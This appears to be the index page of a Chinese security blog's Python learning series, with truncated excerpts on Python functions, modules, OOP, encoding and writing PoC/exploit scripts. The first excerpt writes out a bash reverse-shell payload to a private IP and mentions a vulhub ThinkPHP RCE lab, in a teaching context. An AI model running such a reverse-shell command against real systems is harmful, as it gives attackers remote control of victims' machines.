Python学习日记(终)

本篇文章记录的是Python编写poc和exp的知识。一、poc和exp的区别poc漏洞验证exp漏洞利用他们两个的本质区别是使用的 payload 不同 , 比如我一个远程命令执行的漏洞 , 当我的payload是 id/whoami这样的命令时 , 那么我整个脚本或者工具 , 就是poc , 因为我只是让他执行一下简单的系统命令来判断目标是否存在这样的漏洞 , 如果我的payload是一串 反弹shell的系统命令 如 /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 , 那么我整个工具就是一个exp , 可能这个poc和exp其他的代码都一模一样 , 只有要执行的命令 , 也就是这个命令 , 即 payload 不同 , 决定了这个脚本是poc还是exp二、编写thinkphp5 rce的poc环境自己使用vulhub搭建cd vulhub-master/thinkphp/5.0.23-rce docker-compose up -d使用 argparse 模块接收用户参数 , 加上banner信息im

编程语言学习·网安·生命在于学习 · 2021-12-01 · 116 人浏览
Python学习日记(终)

Python学习日记(十八)

本篇文章记录的是Python命令行编程知识。一、命令行编程什么是命令行编程呢?通过命令行的方式和用户交互,接收用户输入的数据,然后处理,结果再次通过命令行反馈给用户。对于安全人员编写poc和exp,你会发现很多python工具都是命令行版本的。1、input接收在之前的函数中,已经介绍过input函数了,这里我们直接开始案例。如果我们要编写一个RCE漏洞的exp,可以先构造我们的思路示例:url = input("请输入url: ").strip() cmd = input("请输入你要执行的系统命令: ").strip() # 简易模仿代码 print(f"正在对{url} 网站执行 {cmd} 这条系统命令") print("命令执行完成 , 命令的回显: root")稍微美化一下:def main(): banner = """cve-2022-4346-rce 使用方法 : 根据提示依次输入url和命令""" print(b

编程语言学习·网安·生命在于学习 · 2021-11-18 · 160 人浏览
Python学习日记(十八)

Python学习日记(十七)

本篇文章记录的是Python内置模块和requests模块知识。一、模块的介绍1、模块是什么模块 就是一系列功能 ( 函数 ) 的集合体模块的分类内置模块 c语言写的模块/python中自带的第三方模块 别人写好的模块/从网上下载自定义模块 自己自定义的一个python文件本身就是一个模块 , 文件名m.py , 模块名叫m2、 为什么要用模块内置与第三方的模块拿来就可以用,无需定义,这种拿来主义,可以极大的提升自己的开发效率可以将程序的各部分功能提取出来放到一模块中为大家共享使用减少了代码冗余,程序组织结构更加清晰3、 模块怎么使用import 导入[创建模块]# m.py print('======我是m模块中的print代码=====') x1 = 100 def get(arg): print("get ========%s" % arg)[导入模块]# 第一种方式 # import m # 模块导入的时候,里面的代码会

编程语言学习·网安·生命在于学习 · 2021-11-17 · 112 人浏览
Python学习日记(十七)

Python学习日记(十六)

本篇文章记录的是Python面向对象的知识。一、什么是面向对象面向对象编程是一种编程思想 , 一种编程范式 , 不是只有python才有 , 而是所有的编程语言都可以用面向对象的思想去写代码 , 那么面向对象到底是什么 ?面向对象的核心是对象二字,而对象的精髓在于整合,什么意思?所有的程序(脚本) 都是由 "数据" ( 变量 ) 与 "功能"(函数) 组成,因而编写程序的本质就是定义出一系列的数据,然后再定义出一系列的功能来对数据进行操作。示例一个游戏中一个用户 , 每天的打卡代码name = "小王" age = 21 addr = "信思智学" def da_ka(): print(f"{age}的{name},每天都要去{addr}上班,打卡") print("打卡成功") da_ka()上述代码是不是有数据 有功能 , 整个程序抽象成网络游戏中的一个用户每天必须要做的事情 , 那如果有一个新注册的用户小李 , 是不是每天也要做这样的事情 , 程序背后的代码是不是还是这几行 ?

编程语言学习·网安·生命在于学习 · 2021-11-16 · 162 人浏览
Python学习日记(十六)

Python学习日记(十五)

本篇文章记录的是Python匿名函数和面向过程编程的知识。一、lambda对比使用def关键字创建的是有名字的函数,使用lambda关键字创建则是没有名字的函数,即匿名函数语法如下:lambda 参数1,参数2:返回值[定义]lambda x, y: x + y # lambda自带一个return print(lambda x, y: x + y)[调用]# 调用匿名函数 : 函数内存地址 + () # 方式一: res = (lambda x, y: x + y)(1, 2) print(res) # 方式2: x = (lambda x, y: x + y) res1 = x(3, 5) print(res1)以上都不是匿名函数的真正调用方式 , 因为匿名函数的精髓就在于没有名字 , 你这又搞出来一个名字 , 那你干嘛不 用有名函数 def 关键字定义呢?[应用场景]匿名函数与有名函数有相同的作用域,但是匿名意味着引用计数为0,使用一次就释放,所以匿名函数用于临时使用一次的场景,匿名函数通常与其他函数配合使用[max函数]接收一个可迭代对象 , 然后比较 , 返回最大值 ,

编程语言学习·网安·生命在于学习 · 2021-11-15 · 49 人浏览
Python学习日记(十五)

Python学习日记(十四)

本篇文章记录的是Python函数对象和嵌套的知识。一、函数对象精髓:可以把函数名当成变量名去用函数名和变量名一样,都是指向的是内存地址二、函数名的用途1、可以赋值把一个函数名赋值给另一个变量名# func=函数的内存地址 def func(): pass f=func print(func) # <function func at 0x000001E78F9B3EA0> print(f) # <function func at 0x000001E78F9B3EA0>2、当参数函数名也可以当做参数传给另一个函数def func(): pass def foo(x): # × = func的内存地址# print(x) x() foo(func) # foo( func的内存地址)3、当返回值函数名也可以当函数的返回值def func(): pass def foo(x): return x res = foo(func) print(res)4、当元素函数名

编程语言学习·网安·生命在于学习 · 2021-11-14 · 125 人浏览
Python学习日记(十四)

Python学习日记(十三)

本篇文章记录的是Python名称空间和作用域的知识。一、名称空间名称空间,名称即名字,空间就是存放东西的地方,那么名称空间你可以理解为就是放名字的地方,变量名是放在栈区的,变量值是放在堆区的,实际上名称空间是对栈区的划分,有了名称空间我们就可以在栈区中存放相同的名字了,名称空间让他们相互隔离开来,进而也实现了资源隔离,名称空间是一种虚拟化的划分,栈区是真实存在的。==我们讲名称空间只考虑名字 , 是不考虑值的 , 因为名字太重要了 , 通过名字可以引用到值==二、三种名称空间1、 内置名称空间存放python解释器内置的名字 , 比如 print input等>>> print <built-in function print> >>> input <built-in function input>存活周期 :python解释器启动则产生,python解释器关闭则销毁2、 全局名称空间只要不是函数内定义、也不是内置的,剩下的都是全局名称空间的名字import os # os是存放在全局名称空间的名字 x = 123

编程语言学习·网安·生命在于学习 · 2021-11-13 · 118 人浏览
Python学习日记(十三)

Python学习日记(十二)

本篇文章记录的是Python函数参数的知识。一、形参和实参1、形参形参:在定义函数阶段定义的参数叫做形式参数,简称形参,相当于变量名。==函数在定义阶段括号内指定的变量名==def func(x): # x就是形参 print(x)2、实参实参:在调用函数阶段传入的值称之为实际参数,简称实参,相当于变量值,值可以是常量,变量、表达式或三者的组合。==函数在调用阶段括号内传入的值。==def func(name): print(f'我的名字是{name}') func('tom') # 'tom'就是实参 3、形参和实参的关系在调用阶段,实参(变量值)会绑定给形参(变量名),绑定不是目的,目的是在函数体中使用,函数调用结束后,这种绑定关系就会解除,所以无法再函数体外使用。二、三种参数1、位置参数位置参数:按照从左到右的顺序依次定义的参数称之为位置参数。位置形参:在函数定义阶段,按照从左到右的顺序直接定义的变量名。特点:必须传值,多一个不行,少一个也不行。def func(x,y,z): # x,y,z 三个位置形参 return x + y + z位

编程语言学习·网安·生命在于学习 · 2021-11-12 · 128 人浏览
Python学习日记(十二)

Python学习日记(十一)

本篇文章记录的是Python函数的基本使用的知识。一、函数介绍1、什么是函数函数就相当于具备某一功能的工具,就像爆米花机,给玉米就会造出爆米花。2、为什么要用函数组织结构清晰,可读性强代码精简可维护性强,扩展性强3、如何使用函数先定义后调用返回值二、函数定义1、函数定义函数的使用必须遵循先定义,后调用的原则,函数的定义就相当于事先将函数体代码保存起来,然后将内存地址赋值给函数名,函数名就是对这段代码的引用,这和变量的定义是相似的,没有事先定义函数而直接调用,就相当于在引用一个不存在的变量名,同时函数名的命名规范也和变量名一样的,字母数字下划线组成。定义函数的语法:def 函数名(参数1,参数2,...): """文档描述""" 函数体 return 值 # def是关键字,return是返回值定义函数会发生的事情:申请内存空间保存函数体代码将上述内存地址绑定给域名定义函数不会执行函数体代码,但是会检测函数体语法def func(): x print('hello word') # 运行

编程语言学习·网安·生命在于学习 · 2021-11-11 · 126 人浏览
Python学习日记(十一)

Python学习日记(十)

本篇文章记录的是Python字符编码的知识。字符编码谈字符编码,首先谈谈和字符相关的知识一、预备知识1、 python的字符相关(1)字符串我们之前就了解并学习过字符串就是由一串字符组合形成的,毋庸置疑谈字符编码肯定和字符串有关(2) 文本文件在我们没有接触python之前,你可能就已经接触了word文件,尤其是在学生时代,各种通知,作业都是wordword文件本质上就是文本文件,由很多字符组成,只不过当初的你把它叫做汉字或者英文字母。2、 三大核心硬件首先所有的软件都是运行在硬件之上的,与运行软件相关的三大核心硬件分别为cpu,内存,硬盘。首先明确:软件运行之前,软件的代码以及相关的数据都是保存在硬盘上的任何软件的运行都是把数据从硬盘中读入到内存,然后cpu从内存中取出指令执行软件运行过程中产生的数据都是先保存在内存中的,如果想要永久保存数据,则需要将数据由内存写入到硬盘中2、 文本编辑器读取文件内容的流程#阶段1、启动一个文件编辑器(文本编辑器如nodepad++,pycharm,word) #阶段2、文件编辑器会将文件内容从硬盘读入内存 #阶段3、文本编辑器会将刚刚读入内存中

编程语言学习·网安·生命在于学习 · 2021-11-10 · 76 人浏览
Python学习日记(十)
2019 - 2025 赛博保安日志. All Rights Reserved.
Theme Jasmine by Kent Liao 京ICP备2023023335号-2京公网安备11010802044340号